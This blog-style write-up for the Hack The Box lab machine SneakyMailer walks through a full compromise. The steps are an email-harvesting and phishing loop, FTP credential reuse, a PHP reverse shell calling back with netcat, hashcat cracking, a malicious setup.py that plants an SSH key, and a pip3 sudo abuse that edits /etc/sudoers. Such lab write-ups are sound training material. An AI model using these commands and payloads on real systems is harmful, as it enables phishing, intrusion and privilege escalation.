This is a write-up on the SneakyMailer machine challenge from HTB. For more information on challenges like these, check out my post on penetration testing.  Special thanks to HTB user sulcud for creating the challenge.

Reconnaissance

    nmap -Pn -p- 10.10.10.197

A basic nmap reveals several open ports, including a web server that redirects to http://sneakycorp.htb.  Add the name to /etc/hosts in order to access the desired web site.  

    echo 10.10.10.197 sneakycorp.htb >> /etc/hosts

Refresh and navigate to the team page, which contains a list of company email addresses.

The Social Engineering Gimmick

Although not entirely life-like, the trick for this CTF is to simulate a phishing campaign and hope that some recipients will click a malicious link and enter credentials. Start by running a local listener in on port 80 to capture any clicks.

nc -lnvp 80

Run these commands to harvest all the email addresses on the team web page, and send each one a link with the local listener IP as the URL.

curl -vs http://sneakycorp.htb/team.php 2>/dev/null | grep -EiEio '\b[A-Z0-9._%+-]+@[A-Z0-9.-]+\.[A-Z]{2,4}\b' > emails #this will harvest all the emails and save them to a file
echo 10.10.10.197 sneakymailer.htb >> /etc/hosts
for i in `cat emails` ; do swaks -to $i -from [email protected] -header -body "http://<YOUR IP>"; done #swaks is Swiss Army Knife for SMTP

This should return a message in the listener, which can be run through a URL decoder to obtain ^(#J@SkFv2[%KhIxKk(Ju`hqcHl<:Ht as the password for email account [email protected].

Reading Mail

Using an IMAP client, such as Evolution, log in as [email protected].  In the sent-items folder, there is a message to the system administrator which contains the password for user developer.  Those credentials can in turn be used to log into the ftp server running on the same machine.  

Although not strictly necessary, the entire ftp tree can be downloaded with the command below, revealing another website at http://dev.sneakycorp.com.  Add this site to /etc/hosts.

wget -m --user="developer" --password="m^AsY7vTKVT+dV1{WOU%@NaHkUAId3]C" ftp://10.10.10.197

Reverse Shell

Create a PHP-based reverse shell script called reverse.php.

 <?php
  echo "<pre>";
  $cmd = ('nc -e /bin/bash <YOUR IP> 1234');
  system($cmd);
  echo "</pre>";
?>

Upload the script to the ftp server and change the permissions so it is executable.

# at the ftp prompt:
cd dev
put reverse.php
chmod 777 reverse.php

Launch another local listener with nc -lnvp 1234 and browse to http://dev.sneakycorp.htb/reverse.php. This should open a reverse shell in the listener.  From there, navigate to /var/www/pypi.sneakycorp.htb and find the docroot for yet another website http://pypi.sneakycorp.htb (add this to /etc/hosts as well).  PyPi is a Python package installer. With the right credentials, it might be leveraged to install custom code or run custom scripts.

In the docroot there is also a .htaccess file with the password for web user pypi. Save the file locally and use the hashcat command to crack the password, which is soufianeelhaoui (rockyou.txt is a popular wordlist included in Kali Linux that contains 14 million passwords which were stolen, and later released publicly, from a company called Rock You).

hashcat -O -a 0 -m 1600 hash.txt rockyou.txt

Getting User

In the reverse shell, su to the developer account using the previously discovered credentials. Have an SSH public key handy and create the following files.

cat > ~/.pypirc <<'EOF'
[distutils]
index-servers = local

[local]
repository: http://pypi.sneakycorp.htb:8080
username: pypi
password: soufianeelhaoui
EOF

cd /tmp
cat > auth <<'EOF'
<YOUR PUBLIC KEY>
EOF

mkdir module
cd module
cat > setup.py <<'EOF'
import setuptools
import os

cmd = "/usr/bin/cat /tmp/auth >> /home/low/.ssh/authorized_keys"
os.system(cmd)

setuptools.setup(
    name="module", # Replace with your own username
    version="0.0.1",
    author="Example Author",
    author_email="[email protected]",
    description="A small example package",
    long_description="long_description",
    long_description_content_type="text/markdown",
    url="https://github.com/pypa/sampleproject",
    packages=setuptools.find_packages(),
    classifiers=[
        "Programming Language :: Python :: 3",
        "License :: OSI Approved :: MIT License",
        "Operating System :: OS Independent",
    ],
)
EOF
chmod 777 setup.py

Run the PyPi setup script, which should copy the public key to the authorized_keys file for the low user.  

python3 setup.py sdist register -r local upload -r local

Use the corresponding SSH private key to log in as the low user and obtain user.txt. 

ssh -i <keyfile> [email protected]
cat user.txt

Getting Root

Running sudo -l shows that the user low can run the pip3 command (another Python package manager) without entering any password. This is easy to exploit by changing the previous setup script and using pip3 to run it as root.

Navigate to /tmp/module and modify the setup.py script so that the line beginning with cmd looks like this:

cmd = "echo 'low ALL = (root) NOPASSWD: ALL' >> /etc/sudoers"

Run the following commands to obtain root access.

sudo /usr/bin/pip3 install .  -force-reinstall
sudo su -
cat root.txt